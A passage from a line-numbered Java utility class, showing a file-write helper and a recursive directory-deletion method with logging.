filePath, byte[] content) { 101 | try { 102 | Files.write(filePath, content); 103 | } catch (IOException e) { 104 | e.printStackTrace(); 105 | } 106 | } 107 | 108 | public static void deleteDirectory(Path 
directoryPath) throws IOException { 109 | try { 110 | FileSystemUtils.deleteRecursively(directoryPath); 111 | logger.info("Directory deletion successful: {}", directoryPath); 112 | } catch (IOException e) { 113 | logger.info("Directory deletion failed: {}", directoryPath); 114 | } 115 | } 116 | 117 | } 118 | --------------------------------------------------------------------------------